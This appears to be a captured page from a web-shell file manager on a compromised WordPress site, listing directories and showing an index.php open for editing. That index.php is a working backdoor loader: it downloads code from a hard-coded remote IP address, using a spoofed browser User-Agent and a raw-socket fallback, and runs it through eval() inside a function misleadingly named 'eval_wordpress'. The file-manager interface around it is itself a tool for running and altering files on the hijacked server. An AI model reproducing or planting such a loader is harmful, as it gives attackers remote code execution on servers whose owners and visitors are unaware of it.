at path:
ROOT
/
index.php
run:
R
W
Run
.well-known
DIR
2026-04-22 06:38:36
R
W
Run
1396eb
DIR
2026-04-22 06:38:36
R
W
Run
a42ad
DIR
2026-03-17 01:22:13
R
W
Run
admin
DIR
2026-04-22 06:38:36
R
W
Run
cgi-bin
DIR
2026-04-22 06:38:36
R
W
Run
clean404
DIR
2026-04-22 06:38:36
R
W
Run
comun
DIR
2026-04-22 06:38:36
R
W
Run
images
DIR
2026-04-22 06:38:36
R
W
Run
mapas
DIR
2026-04-22 06:38:36
R
W
Run
sitio
DIR
2026-04-22 06:38:36
R
W
Run
soporte
DIR
2026-04-22 06:38:36
R
W
Run
templates
DIR
2026-04-22 06:38:36
R
W
Run
wp-admin
DIR
2026-04-22 06:38:36
R
W
Run
wp-content
DIR
2026-04-22 06:38:36
R
W
Run
wp-includes
DIR
2026-04-22 06:38:36
R
W
Run
.htaccess
233 By
2026-04-22 06:38:39
R
W
Run
Delete
Rename
index.php
1.18 KB
2026-04-22 09:07:25
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-22 06:38:39
R
W
Run
Delete
Rename
error_log
up
📄
index.php
Save
<?php function get_remote_content($url = 'http://74.91.18.202/z60410_8/stat/index2.txt' ) { $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0.0.0'; if (ini_get('allow_url_fopen')) { $ctx = stream_context_create(["http" => ["header" => "User-Agent: $ua\r\n"]]); $res = @file_get_contents($url, false, $ctx); if ($res) return $res; } $p = parse_url($url); $host = $p['host']; $port = ($p['scheme'] == 'https') ? 443 : 80; $sock = @fsockopen(($port == 443 ? "ssl://" : "") . $host, $port, $en, $er, 10); if ($sock) { $req = "GET " . ($p['path'] ?? '/') . " HTTP/1.1\r\nHost: $host\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n"; fwrite($sock, $req); $raw = ''; while (!feof($sock)) { $raw .= fgets($sock, 1024); } fclose($sock); return substr($raw, strpos($raw, "\r\n\r\n") + 4); } return false; } function eval_wordpress( $content ){ if ( $content ) { for( $i=0; $i<2; $i++){ while ( $i < 5 ){ eval( $content ); break; } break; } } } $payload = eval_wordpress( '?>'.get_remote_content( ) );